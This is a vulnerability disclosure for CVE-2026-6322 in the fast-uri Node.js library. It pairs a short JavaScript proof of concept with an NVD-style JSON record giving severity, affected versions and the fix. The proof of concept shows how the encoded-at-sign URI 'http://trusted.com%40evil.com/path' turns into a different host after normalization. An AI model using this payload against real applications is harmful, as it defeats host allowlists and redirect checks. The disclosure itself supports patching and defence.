CVE-2026-6322

// PoC for CVE-2026-6322 // Demonstrating the host authority bypass const { parse, serialize } = require('fast-uri'); // Malicious URI containing an encoded @ (%40) in the host part // Attacker intends to route requests to evil.com const maliciousUri = 'http://trusted.com%40evil.com/path'; console.log('Original URI:', maliciousUri); // Parse the URI const parsed = parse(maliciousUri); console.log('Parsed Host component:', parsed.host); // Normalize/Serialize the URI (Vulnerable behavior) const normalizedUri = serialize(parsed); console.log('Normalized URI:', normalizedUri); // Verify the authority change const reParsed = parse(normalizedUri); console.log('Final Host after Normalization:', reParsed.host); console.log('Final Userinfo:', reParsed.userinfo); // Expected output in vulnerable versions: // Normalized URI: http://[email protected]/path // Final Host: evil.com

{"cve": {"id": "CVE-2026-6322", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-05-05T11:16:33.360", "lastModified": "2026-05-12T19:11:31.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions <= 3.1.1 are affected. Update to 3.1.2 or later."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-436"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openjsf:fast-uri:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.1.2", "matchCriteriaId": "0A43D369-152F-4AA7-B998-6CB40A81D94D"}]}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}]}}